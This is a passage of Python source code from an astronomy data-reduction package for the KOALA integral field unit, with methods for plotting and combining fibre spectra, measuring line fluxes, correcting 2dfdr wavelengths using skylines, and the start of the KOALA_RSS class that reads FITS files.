if xmin == 0:
xmin = self.wavelength[0]
if xmax == 0:
xmax = self.wavelength[-1]
if ymin == 0:
ymin = np.nanmin(spectrum)
if ymax == 0:
ymax = np.nanmax(spectrum)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectra(
self,
list_spectra="all",
wavelength_range=[0],
xmin="",
xmax="",
ymax=1000,
ymin=-100,
fig_size=10,
save_file="",
sky=True,
):
"""
Plot spectrum of a list pf spaxels.
Parameters
----------
list_spectra:
spaxels to show spectrum. Default is all.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> rss1.plot_spectra([1200,1300])
"""
plt.figure(figsize=(fig_size, fig_size / 2.5))
if list_spectra == "all":
list_spectra = list(range(self.n_spectra))
if len(wavelength_range) == 2:
plt.xlim(wavelength_range[0], wavelength_range[1])
if xmin == "":
xmin = np.nanmin(self.wavelength)
if xmax == "":
xmax = np.nanmax(self.wavelength)
# title = "Spectrum of spaxel {} in {}".format(spectrum_number, self.description)
# plt.title(title)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
for i in list_spectra:
self.plot_spectrum(i, sky)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_combined_spectrum(
self,
list_spectra="all",
sky=True,
median=False,
xmin="",
xmax="",
ymax="",
ymin="",
fig_size=10,
save_file="",
plot=True,
):
"""
Plot combined spectrum of a list and return the combined spectrum.
Parameters
----------
list_spectra:
spaxels to show combined spectrum. Default is all.
sky:
if True substracts the sky
Example
-------
>>> rss1.plot_spectrum(550, sky=True)
"""
if list_spectra == "all":
list_spectra = list(range(self.n_spectra))
spectrum = np.zeros_like(self.intensity_corrected[list_spectra[0]])
value_list = []
# Note: spectrum of fibre is located in position fibre-1, e.g., spectrum of fibre 1 -> intensity_corrected[0]
if sky:
for fibre in list_spectra:
value_list.append(self.intensity_corrected[fibre - 1])
else:
for fibre in list_spectra:
value_list.append(
self.intensity_corrected[fibre - 1] + self.sky_emission
)
if median:
spectrum = np.nanmedian(value_list, axis=0)
else:
spectrum = np.nansum(value_list, axis=0)
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
if xmin == "":
xmin = np.nanmin(self.wavelength)
if xmax == "":
xmax = np.nanmax(self.wavelength)
if ymin == "":
ymin = np.nanmin(spectrum)
if ymax == "":
ymax = np.nanmax(spectrum)
plt.plot(self.wavelength, spectrum)
if len(list_spectra) == list_spectra[-1] - list_spectra[0] + 1:
title = "{} - Combined spectrum in range [{},{}]".format(
self.description, list_spectra[0], list_spectra[-1]
)
else:
title = "Combined spectrum using requested fibres"
plt.title(title)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Relative Flux")
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
return spectrum
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def flux_between(self, lambda_min, lambda_max, list_spectra=[]):
"""
Parameters
----------
lambda_min
lambda_max
list_spectra
Returns
-------
"""
index_min = np.searchsorted(self.wavelength, lambda_min)
index_max = np.searchsorted(self.wavelength, lambda_max) + 1
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
n_spectra = len(list_spectra)
fluxes = np.empty(n_spectra)
variance = np.empty(n_spectra)
for i in range(n_spectra):
fluxes[i] = np.nanmean(self.intensity[list_spectra[i], index_min:index_max])
variance[i] = np.nanmean(
self.variance[list_spectra[i], index_min:index_max]
)
return fluxes * (lambda_max - lambda_min), variance * (lambda_max - lambda_min)
# WARNING: Are we overestimating errors?
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def median_between(self, lambda_min, lambda_max, list_spectra=[]):
"""
Parameters
----------
lambda_min
lambda_max
list_spectra
Returns
-------
"""
index_min = np.searchsorted(self.wavelength, lambda_min)
index_max = np.searchsorted(self.wavelength, lambda_max) + 1
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
n_spectra = len(list_spectra)
medians = np.empty(n_spectra)
for i in range(n_spectra):
medians[i] = np.nanmedian(
self.intensity[list_spectra[i], index_min:index_max]
)
return medians
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def line_flux(
self,
left_min,
left_max,
line_min,
line_max,
right_min,
right_max,
list_spectra=[],
):
"""
Parameters
----------
left_min
left_max
line_min
line_max
right_min
right_max
list_spectra
Returns
-------
"""
# TODO: can remove old_div once this function is understood, currently not called in whole module.
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
line, var_line = self.flux_between(line_min, line_max, list_spectra)
left, var_left = old_div(self.flux_between(left_min, left_max, list_spectra), (
left_max - left_min
))
right, var_right = old_div(self.flux_between(right_min, right_max, list_spectra), (
left_max - left_min
))
wavelength_left = old_div((left_min + left_max), 2)
wavelength_line = old_div((line_min + line_max), 2)
wavelength_right = old_div((right_min + right_max), 2)
continuum = left + old_div((right - left) * (wavelength_line - wavelength_left), (
wavelength_right - wavelength_left
))
var_continuum = old_div((var_left + var_right), 2)
return (
line - continuum * (line_max - line_min),
var_line + var_continuum * (line_max - line_min),
)
# WARNING: Are we overestimating errors?
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def RSS_map(
self,
variable,
norm=colors.LogNorm(),
list_spectra=[],
title=" - RSS map",
color_bar_text="Integrated Flux [Arbitrary units]",
):
"""
Plot map showing the offsets, coloured by variable.
Parameters
----------
variable
norm
list_spectra
title
color_bar_text
Returns
-------
"""
if len(list_spectra) == 0:
list_spectra = list(range(self.n_spectra))
plt.figure(figsize=(10, 10))
plt.scatter(
self.offset_RA_arcsec[list_spectra],
self.offset_DEC_arcsec[list_spectra],
c=variable[list_spectra],
cmap=fuego_color_map,
norm=norm,
s=260,
marker="h",
)
plt.title(self.description + title)
plt.xlim(
np.nanmin(self.offset_RA_arcsec) - 0.7,
np.nanmax(self.offset_RA_arcsec) + 0.7,
)
plt.ylim(
np.nanmin(self.offset_DEC_arcsec) - 0.7,
np.nanmax(self.offset_DEC_arcsec) + 0.7,
)
plt.xlabel("$\Delta$ RA [arcsec]")
plt.ylabel("$\Delta$ DEC [arcsec]")
plt.minorticks_on()
plt.grid(which="both")
plt.gca().invert_xaxis()
cbar = plt.colorbar()
plt.clim(np.nanmin(variable[list_spectra]), np.nanmax(variable[list_spectra]))
cbar.set_label(color_bar_text, rotation=90, labelpad=40)
cbar.ax.tick_params()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def RSS_image(
self,
image=[0],
norm=colors.Normalize(),
cmap="seismic_r",
clow=0,
chigh=0,
labelpad=10,
title=" - RSS image",
color_bar_text="Integrated Flux [Arbitrary units]",
fig_size=13.5,
):
"""
Plot RSS image coloured by variable.
cmap = "binary_r" nice greyscale
Parameters
----------
image
norm
cmap
clow
chigh
labelpad
title
color_bar_text
fig_size
Returns
-------
"""
if np.nanmedian(image) == 0:
image = self.intensity_corrected
if clow == 0:
clow = np.nanpercentile(image, 5)
if chigh == 0:
chigh = np.nanpercentile(image, 95)
if cmap == "seismic_r":
max_abs = np.nanmax([np.abs(clow), np.abs(chigh)])
clow = -max_abs
chigh = max_abs
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.imshow(image, norm=norm, cmap=cmap, clim=(clow, chigh))
plt.title(self.description + title)
plt.minorticks_on()
plt.gca().invert_yaxis()
# plt.colorbar()
cbar = plt.colorbar()
cbar.set_label(color_bar_text, rotation=90, labelpad=labelpad)
cbar.ax.tick_params()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_corrected_vs_uncorrected_spectrum(self, high_fibres=10, fig_size=12):
"""
Parameters
----------
high_fibres
fig_size
Returns
-------
"""
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[-1 - fibre_])
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
I_ymin = np.nanmin([np.nanmin(I), np.nanmin(Ic)])
I_ymax = np.nanmax([np.nanmax(I), np.nanmax(Ic)])
I_rango = I_ymax - I_ymin
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.ylim([I_ymin - (I_rango/10), I_ymax + (I_rango/10)])
plt.title(
self.object
+ " - Combined spectrum - "
+ "{}".format(high_fibres)
+ " fibres with highest intensity"
)
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Idea: take a RSS dominated by skylines. Read it (only throughput correction). For each fibre, fit Gaussians to ~10 skylines.
# Compare with REST wavelengths. Get a median value per fibre. Perform a second-order fit to all median values.
# Correct for that using a reference fibre (1). Save results to be applied to the rest of files of the night (assuming same configuration).
def fix_2dfdr_wavelengths(
self,
sol=[0, 0, 0],
fibre=0,
maxima_sigma=2.5,
maxima_offset=1.5,
xmin=7740,
xmax=7770,
ymin=0,
ymax=1000,
plot=True,
verbose=True,
warnings=True,
):
"""
Parameters
----------
sol
fibre
maxima_sigma
maxima_offset
xmin
xmax
ymin
ymax
plot
verbose
warnings
Returns
-------
"""
print("\n> Fixing 2dfdr wavelengths using skylines.")
w = self.wavelength
if sol[0] == 0: # Solutions are not given
# Read file with sky emission line
sky_lines_file = "sky_lines_rest.dat"
(
sl_center,
sl_name,
sl_fnl,
sl_lowlow,
sl_lowhigh,
sl_highlow,
sl_highhigh,
sl_lmin,
sl_lmax,
) = read_table(
sky_lines_file, ["f", "s", "f", "f", "f", "f", "f", "f", "f"]
)
number_sl = len(sl_center)
# Fitting Gaussians to skylines...
say_status = 0
self.wavelength_offset_per_fibre = []
wave_median_offset = []
print("\n> Performing a Gaussian fit to selected, bright skylines... (this will FAIL if RSS is not corrected for CCD defects...)")
if fibre != 0:
f_i = fibre
f_f = fibre + 1
print(" Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
verbose = True
warnings = True
else:
f_i = 0
f_f = self.n_spectra
verbose = False
for fibre in range(f_i, f_f): # (self.n_spectra):
spectrum = self.intensity_corrected[fibre]
if fibre == say_status:
print(" Checking fibre {:4} ... ({:6.2f} % completed) ...".format(
fibre, fibre * 100.0 / self.n_spectra
))
say_status = say_status + 20
# Gaussian fits to the sky spectrum
sl_gaussian_flux = []
sl_gaussian_sigma = []
sl_gauss_center = []
sl_offset = []
sl_offset_good = []
if verbose:
print("\n> Performing Gaussian fitting to bright sky lines in all fibres of rss file...")
for i in range(number_sl):
if sl_fnl[i] == 0:
plot_fit = False
else:
plot_fit = True
resultado = fluxes(
w,
spectrum,
sl_center[i],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad=2.1 * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings,
) # Broad is FWHM for Gaussian sigm a= 1,
sl_gaussian_flux.append(resultado[3])
sl_gauss_center.append(resultado[1])
sl_gaussian_sigma.append(resultado[5] / 2.355)
sl_offset.append(sl_gauss_center[i] - sl_center[i])
if (
sl_gaussian_flux[i] < 0
or np.abs(sl_center[i] - sl_gauss_center[i]) > maxima_offset
or sl_gaussian_sigma[i] > maxima_sigma
):
if verbose:
print(" Bad fitting for {} ... ignoring this fit...".format(sl_center[i]))
else:
sl_offset_good.append(sl_offset[i])
if verbose:
print(" Fitted wavelength for sky line {:8.3f}: center = {:8.3f} sigma = {:6.3f} offset = {:7.3f} ".format(
sl_center[i],
sl_gauss_center[i],
sl_gaussian_sigma[i],
sl_offset[i],
))
median_offset_fibre = np.nanmedian(sl_offset_good)
wave_median_offset.append(median_offset_fibre)
if verbose:
print("\n> Median offset for fibre {:3} = {:7.3f}".format(
fibre, median_offset_fibre
))
# Second-order fit ...
xfibre = list(range(0, self.n_spectra))
a2x, a1x, a0x = np.polyfit(xfibre, wave_median_offset, 2)
print("\n> Fitting a second-order polynomy a0x + a1x * fibre + a2x * fibre**2:")
else:
print("\n> Solution to the second-order polynomy a0x + a1x * fibre + a2x * fibre**2 have been provided:")
a0x = sol[0]
a1x = sol[1]
a2x = sol[2]
xfibre = list(range(0, self.n_spectra))
print(" a0x = {} a1x = {} a2x = {}".format(a0x, a1x, a2x))
self.wavelength_parameters = [a0x, a1x, a2x] # Save solutions
fx = a0x + a1x * np.array(xfibre) + a2x * np.array(xfibre) ** 2
if plot:
plt.figure(figsize=(10, 4))
if sol[0] == 0:
plt.plot(xfibre, wave_median_offset)
pf = wave_median_offset
else:
pf = fx
plt.plot(xfibre, fx, "r")
plot_plot(
xfibre,
pf,
ptitle="Second-order fit to individual offsets",
xmin=-20,
xmax=1000,
xlabel="Fibre",
ylabel="offset",
)
# Applying results
print("\n> Applying results to all fibres...")
for fibre in xfibre:
f = self.intensity_corrected[fibre]
w_shift = fx[fibre]
self.intensity_corrected[fibre] = rebin_spec_shift(w, f, w_shift)
# Check results
if plot:
plt.figure(figsize=(10, 4))
for i in [0, 300, 600, 950]:
plt.plot(w, self.intensity[i])
plot_plot(
w,
self.intensity[0],
ptitle="Before corrections, fibres 0, 300, 600, 950",
xmin=xmin,
xmax=xmax,
ymin=ymin,
ymax=ymax,
)
plt.figure(figsize=(10, 4))
for i in [0, 300, 600, 950]:
plt.plot(w, self.intensity_corrected[i])
plot_plot(
w,
self.intensity_corrected[0],
ptitle="Checking wavelength corrections in fibres 0, 300, 600, 950",
xmin=xmin,
xmax=xmax,
ymin=ymin,
ymax=ymax,
)
print("\n> Small fixing of the 2dFdr wavelengths done!")
return
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# KOALA_RSS CLASS
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class KOALA_RSS(RSS):
"""
This class reads the FITS files returned by
`2dfdr
<https://aat.anu.edu.au/science/instruments/current/AAOmega/reduction>`_
and performs basic analysis tasks (see description under each method).
Parameters
----------
filename : string
FITS file returned by 2dfdr, containing the Raw Stacked Spectra.
The code makes sure that it contains 1000 spectra
with 2048 wavelengths each.
Example
-------
>>> pointing1 = KOALA_RSS('data/16jan20058red.fits')
> Reading file "data/16jan20058red.fits" ...
2048 wavelength points between 6271.33984375 and 7435.43408203
1000 spaxels
These numbers are the right ones for KOALA!
DONE!
"""
# -----------------------------------------------------------------------------
def __init__(
self,
filename,
save_rss_to_fits_file="",
rss_clean=False, # TASK_KOALA_RSS
apply_throughput=True,
skyflat="",
plot_skyflat=False,
flat="",
nskyflat=True,
correct_ccd_defects=False,
correct_high_cosmics=False,
clip_high=100,
step_ccd=50,
remove_5578=False,
plot_suspicious_fibres=False,
fix_wavelengths=False,
sol=[0, 0, 0],
sky_method="self",
n_sky=50,
sky_fibres=[1000], # do_sky=True
sky_spectrum=[0],
sky_rss=[0],
scale_sky_rss=0,
scale_sky_1D=1.0,
is_sky=False,
win_sky=151,
auto_scale_sky=False,
correct_negative_sky=False,
sky_wave_min=0,
sky_wave_max=0,
cut_sky=5.0,
fmin=1,
fmax=10,
individual_sky_substraction=False,
fibre_list=[100, 200, 300, 400, 500, 600, 700, 800, 900],
do_extinction=True,
telluric_correction=[0],
id_el=False,
high_fibres=10,
brightest_line="Ha",
cut=1.5,
broad=1.0,
plot_id_el=False,
id_list=[0],
brightest_line_wavelength=0,
clean_sky_residuals=False,
dclip=3.0,
extra_w=1.3,
step_csr=25,
fibre=0,
valid_wave_min=0,
valid_wave_max=0,
warnings=True,
verbose=False,
plot=True,
norm=colors.LogNorm(),
fig_size=12,
):
"""
Parameters
----------
filename
save_rss_to_fits_file
rss_clean
apply_throughput
skyflat
plot_skyflat
flat
nskyflat
correct_ccd_defects
correct_high_cosmics
clip_high
step_ccd
remove_5578
plot_suspicious_fibres
fix_wavelengths
sol
sky_method
n_sky
sky_fibres
sky_spectrum
sky_rss
scale_sky_rss
scale_sky_1D
is_sky
win_sky
auto_scale_sky
correct_negative_sky
sky_wave_min
sky_wave_max
cut_sky
fmin
fmax
individual_sky_substraction
fibre_list
do_extinction
telluric_correction
id_el
high_fibres
brightest_line
cut
broad
plot_id_el
id_list
brightest_line_wavelength
clean_sky_residuals
dclip
extra_w
step_csr
fibre
valid_wave_min
valid_wave_max
warnings
verbose
plot
norm
fig_size
"""
# Just read file if rss_clean = True
if rss_clean:
apply_throughput = False
correct_ccd_defects = False
fix_wavelengths = False
sol = [0, 0, 0]
sky_method = "none"
do_extinction = False
telluric_correction = [0]
id_el = False
clean_sky_residuals = False
plot = False
correct_negative_sky = False
# Create RSS object
super(KOALA_RSS, self).__init__()
print("\n> Reading file", '"' + filename + '"', "...")
RSS_fits_file = fits.open(filename) # Open file
self.rss_list = []
# General info:
self.object = RSS_fits_file[FitsExt.main].header["OBJECT"]
self.description = self.object + " - " + filename
self.RA_centre_deg = RSS_fits_file[FitsExt.fibres_ifu].header["CENRA"] * 180/np.pi
self.DEC_centre_deg = RSS_fits_file[FitsExt.fibres_ifu].header["CENDEC"] * 180/np.pi
self.exptime = RSS_fits_file[FitsExt.main].header["EXPOSED"]
# WARNING: Something is probably wrong/inaccurate here!
# Nominal offsets between pointings are totally wrong!
# Read good/bad spaxels
all_spaxels = list(range(len(RSS_fits_file[FitsExt.fibres_ifu].data)))
quality_flag = [RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.quality_flag] for i in all_spaxels]
good_spaxels = [i for i in all_spaxels if quality_flag[i] == 1]
bad_spaxels = [i for i in all_spaxels if quality_flag[i] == 0]
# for i in range(1):
# print i, RSS_fits_file[2]
#
# Create wavelength, intensity, and variance arrays only for good spaxels
wcsKOALA = WCS(RSS_fits_file[FitsExt.main].header)
# variance = RSS_fits_file[1].data[good_spaxels]
index_wave = np.arange(RSS_fits_file[FitsExt.main].header["NAXIS1"])
wavelength = wcsKOALA.dropaxis(1).wcs_pix2world(index_wave, 0)[0]
intensity = RSS_fits_file[FitsExt.main].data[good_spaxels]
print("\n Number of spectra in this RSS = {}, number of good spectra = {} , number of bad spectra ={}".format(
len(RSS_fits_file[FitsExt.main].data), len(good_spaxels), len(bad_spaxels)))
print(" Bad fibres = {}".format(bad_spaxels))
# Read errors using RSS_fits_file[1]
# self.header1 = RSS_fits_file[1].data # CHECK WHEN DOING ERRORS !!!
# Read spaxel positions on sky using RSS_fits_file[2]
self.header2_data = RSS_fits_file[FitsExt.fibres_ifu].data
# CAREFUL !! header 2 has the info of BAD fibres, if we are reading from our created RSS files we have to do it in a different way...
# print RSS_fits_file[2].data
if len(bad_spaxels) == 0:
offset_RA_arcsec_ = []
offset_DEC_arcsec_ = []
for i in range(len(good_spaxels)):
offset_RA_arcsec_.append(self.header2_data[i][FitsFibresIFUIndex.ra_offset])
offset_DEC_arcsec_.append(self.header2_data[i][FitsFibresIFUIndex.dec_offset])
offset_RA_arcsec = np.array(offset_RA_arcsec_)
offset_DEC_arcsec = np.array(offset_DEC_arcsec_)
variance = np.zeros_like(intensity) # CHECK FOR ERRORS
else:
offset_RA_arcsec = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.ra_offset] for i in good_spaxels]
)
offset_DEC_arcsec = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.dec_offset] for i in good_spaxels]
)
self.ID = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.spec_id] for i in good_spaxels]
) # These are the good fibres
variance = RSS_fits_file[FitsExt.var].data[good_spaxels] # CHECK FOR ERRORS
self.ZDSTART = RSS_fits_file[FitsExt.main].header["ZDSTART"] # Zenith distance (degrees?)
self.ZDEND = RSS_fits_file[FitsExt.main].header["ZDEND"]
# KOALA-specific stuff
self.PA = RSS_fits_file[FitsExt.main].header["TEL_PA"] # Position angle?
self.grating = RSS_fits_file[FitsExt.main].header["GRATID"]
# Check RED / BLUE arm for AAOmega
if RSS_fits_file[FitsExt.main].header["SPECTID"] == "RD":
AAOmega_Arm = "RED"
if RSS_fits_file[FitsExt.main].header["SPECTID"] == "BL":
AAOmega_Arm = "BLUE"
# For WCS
self.CRVAL1_CDELT1_CRPIX1 = []
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CRVAL1"]) # see https://idlastro.gsfc.nasa.gov/ftp/pro/astrom/aaareadme.txt maybe?
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CDELT1"])
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CRPIX1"])
# SET RSS
# FROM HERE IT WAS self.set_data before ------------------------------------------
self.wavelength = wavelength
self.n_wave = len(wavelength)
# Check that dimensions match KOALA numbers
if self.n_wave != 2048 and len(all_spaxels) != 1000:
print("\n *** WARNING *** : These numbers are NOT the standard ones for KOALA")
print("\n> Setting the data for this file:")
if variance.shape != intensity.shape:
print("\n* ERROR: * the intensity and variance matrices are {} and {} respectively\n".format(intensity.shape, variance.shape))
raise ValueError
n_dim = len(intensity.shape)
if n_dim == 2:
self.intensity = intensity
self.variance = variance
elif n_dim == 1:
self.intensity = intensity.reshape((1, self.n_wave))
self.variance = variance.reshape((1, self.n_wave))
else:
print("\n* ERROR: * the intensity matrix supplied has {} dimensions\n".format(n_dim))
raise ValueError
self.n_spectra = self.intensity.shape[0]
self.n_wave = len(self.wavelength)
print(" Found {} spectra with {} wavelengths".format(
self.n_spectra, self.n_wave
), "between {:.2f} and {:.2f} Angstrom".format(
self.wavelength[0], self.wavelength[-1]
))
if self.intensity.shape[1] != self.n_wave:
print("\n* ERROR: * spectra have {} wavelengths rather than {}".format(self.intensity.shape[1], self.n_wave))
raise ValueError
if (
len(offset_RA_arcsec) != self.n_spectra
or len(offset_DEC_arcsec) != self.n_spectra
):
print("\n* ERROR: * offsets (RA, DEC) = ({},{}) rather than {}".format(
len(self.offset_RA_arcsec), len(self.offset_DEC_arcsec), self.n_spectra
)
)
raise ValueError
else:
self.offset_RA_arcsec = offset_RA_arcsec
self.offset_DEC_arcsec = offset_DEC_arcsec
# Check if NARROW (spaxel_size = 0.7 arcsec)
# or WIDE (spaxel_size=1.25) field of view
# (if offset_max - offset_min > 31 arcsec in both directions)
if (
np.max(offset_RA_arcsec) - np.min(offset_RA_arcsec) > 31
or np.max(offset_DEC_arcsec) - np.min(offset_DEC_arcsec) > 31
):
self.spaxel_size = 1.25
field = "WIDE"
else:
self.spaxel_size = 0.7
field = "NARROW"
# Get min and max for rss
self.RA_min, self.RA_max, self.DEC_min, self.DEC_max = coord_range([self])
self.DEC_segment = (
self.DEC_max - self.DEC_min
) * 3600.0 # +1.25 for converting to total field of view
self.RA_segment = (self.RA_max - self.RA_min) * 3600.0 # +1.25
# UPDATE THIS TO BE VALID TO ALL GRATINGS!
# ALSO CONSIDER WAVELENGTH RANGE FOR SKYFLATS AND OBJECTS
if valid_wave_min == 0 and valid_wave_max == 0:
self.valid_wave_min = np.min(self.wavelength)
self.valid_wave_max = np.max(self.wavelength)
# if self.grating == "1000R":
# self.valid_wave_min = 6600. # CHECK ALL OF THIS...
# self.valid_wave_max = 6800.
# print " For 1000R, we use the [6200, 7400] range."
# if self.grating == "1500V":
# self.valid_wave_min = np.min(self.wavelength)
# self.valid_wave_max = np.max(self.wavelength)
# print " For 1500V, we use all the range."
# if self.grating == "580V":
# self.valid_wave_min = 3650.
# self.valid_wave_max = 5700.
# print " For 580V, we use the [3650, 5700] range."
# if self.grating == "1500V":
# self.valid_wave_min = 4620. #4550
# self.valid_wave_max = 5350. #5350
# print " For 1500V, we use the [4550, 5350] range."
else:
self.valid_wave_min = valid_wave_min
self.valid_wave_max = valid_wave_max
print(" As specified, we use the [ {} , {} ] range.".format(self.valid_wave_min, self.valid_wave_max))
# Plot RSS_image
if plot:
self.RSS_image(image=self.intensity, cmap="binary_r")
# Deep copy of intensity into intensity_corrected
self.intensity_corrected = copy.deepcopy(self.intensity)
# Divide by flatfield if needed
if flat != "":
print("\n> Dividing the data by the flatfield provided...")
self.intensity_corrected = (self.intensity_corrected/flat.intensity_corrected) # todo: check division per pixel works.
# Check if apply relative throughput & apply it if requested
if apply_throughput:
if plot_skyflat:
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity[i, ])
plt.ylim(0, 200 * np.nanmedian(self.intensity))
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra WITHOUT CONSIDERING throughput correction")
# plt.show()
# plt.close()
print("\n> Applying relative throughput correction using median skyflat values per fibre...")
self.relative_throughput = skyflat.relative_throughput
self.response_sky_spectrum = skyflat.response_sky_spectrum
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :]/self.relative_throughput[i]
)
if nskyflat:
print("\n IMPORTANT: We are dividing intensity data by the sky.response_sky_spectrum !!! ")
print(" This is kind of a flat, the changes are between {} and {}".format(
np.nanmin(skyflat.response_sky_spectrum), np.nanmax(skyflat.response_sky_spectrum)))
print(" ")
self.intensity_corrected = (
self.intensity_corrected/self.response_sky_spectrum
)
if plot_skyflat:
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity_corrected[i, ])
plt.ylim(0, 200 * np.nanmedian(self.intensity_corrected))
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra CONSIDERING throughput correction (median value per fibre)")
# plt.show()
# plt.close()
print(" Intensities corrected for relative throughput stored in self.intensity_corrected !")
text_for_integrated_fibre = "after throughput correction..."
title_for_integrated_fibre = " - Throughput corrected"
else:
if rss_clean == False:
print("\n> Intensities NOT corrected for relative throughput")
self.relative_throughput = np.ones(self.n_spectra)
text_for_integrated_fibre = "..."
title_for_integrated_fibre = ""
# Compute integrated map after throughput correction & plot if requested
self.compute_integrated_fibre(
plot=plot,
title=title_for_integrated_fibre,
text=text_for_integrated_fibre,
warnings=warnings,
correct_negative_sky=correct_negative_sky,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
)
plot_integrated_fibre_again = 0 # Check if we need to plot it again
# Compare corrected vs uncorrected spectrum
# self.plot_corrected_vs_uncorrected_spectrum(high_fibres=high_fibres, fig_size=fig_size)
# Cleaning high cosmics and defects
if sky_method == "1D" or sky_method == "2D":
# If not it will not work when applying scale for sky substraction...
remove_5578 = False
if correct_ccd_defects:
if plot:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
self.correct_high_cosmics_and_defects(
correct_high_cosmics=correct_high_cosmics,
step=step_ccd,
remove_5578=remove_5578,
clip_high=clip_high,
plot_suspicious_fibres=plot_suspicious_fibres,
warnings=warnings,
verbose=verbose,
plot=plot,
)
# Compare corrected vs uncorrected spectrum
if plot:
self.plot_corrected_vs_uncorrected_spectrum(
high_fibres=high_fibres, fig_size=fig_size
)
# Fixing small wavelengths
if sol[0] != 0:
self.fix_2dfdr_wavelengths(sol=sol)
else:
if fix_wavelengths:
self.fix_2dfdr_wavelengths()
# else:
# print "\n> We don't fix 2dfdr wavelengths on this rss."
# SKY SUBSTRACTION sky_method
#
# Several options here: (1) "1D" : Consider a single sky spectrum, scale it and substract it
# (2) "2D" : Consider a 2D sky. i.e., a sky image, scale it and substract it fibre by fibre
# (3) "self" : Obtain the sky spectrum using the n_sky lowest fibres in the RSS file (DEFAULT)
# (4) "none" : None sky substraction is performed
# (5) "1Dfit": Using an external 1D sky spectrum, fits sky lines in both sky spectrum AND all the fibres
if sky_method != "none" and is_sky == False:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
# (5)
if sky_method == "1Dfit":
print("\n> Fitting sky lines in both a provided sky spectrum AND all the fibres")
print(" This process takes ~20 minutes for 385R!\n")
if scale_sky_1D != 0:
print(" Sky spectrum scaled by {}".format(scale_sky_1D))
sky = np.array(sky_spectrum) * scale_sky_1D
print(" Sky spectrum provided = {}".format(sky))
self.sky_emission = sky
self.fit_and_substract_sky_spectrum(
sky,
brightest_line_wavelength=brightest_line_wavelength,
brightest_line=brightest_line,
maxima_sigma=3.0,
ymin=-50,
ymax=1000,
wmin=0,
wmax=0,
auto_scale_sky=auto_scale_sky,
warnings=False,
verbose=False,
plot=False,
fig_size=12,
fibre=fibre,
)
